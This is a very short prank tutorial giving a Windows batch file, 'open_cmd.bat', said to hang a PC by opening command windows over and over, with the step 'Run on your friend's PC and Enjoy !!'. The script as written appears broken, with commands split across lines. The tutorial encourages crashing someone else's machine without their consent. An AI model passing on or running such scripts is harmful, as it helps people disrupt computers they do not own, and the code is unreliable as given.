Hang PC by opening cmd again and again

Steps :-

1) Open notepad and copy the following code 


echo  
cls    
start  
cls    
open_cmd
cls     

2) Save it as open_cmd.bat (name should be open_cmd.bat)

3) Run on your friend's PC and  Enjoy !!
